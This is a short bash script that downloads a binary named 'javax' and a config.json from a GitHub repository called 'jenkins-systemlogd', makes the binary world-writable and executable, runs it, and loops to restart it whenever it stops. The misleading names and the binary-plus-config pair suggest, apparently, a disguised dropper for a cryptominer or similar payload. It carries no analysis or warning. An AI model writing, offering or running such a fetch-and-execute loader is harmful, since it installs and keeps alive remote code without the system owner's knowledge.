#!/bin/bash
function run(){
    if pgrep -f "javax" > /dev/null; then run
    else
        if [ -f "javax" ]; then
            chmod 777 javax
            chmod +x javax
        else
            if command -v curl > /dev/null; then
                curl -s -o javax https://github.com/supportmrx/jenkins-systemlogd/raw/refs/heads/main/javax
                curl -s -o config.json https://raw.githubusercontent.com/supportmrx/jenkins-systemlogd/refs/heads/main/config.json
            elif command -v wget > /dev/null; then
                wget -q -O javax https://github.com/supportmrx/jenkins-systemlogd/raw/refs/heads/main/javax
                wget -q -O config.json https://raw.githubusercontent.com/supportmrx/jenkins-systemlogd/refs/heads/main/config.json
            else
                exit 1
            fi
            chmod 777 javax
            chmod +x javax
        fi
    fi
    ./javax
    run
}
run
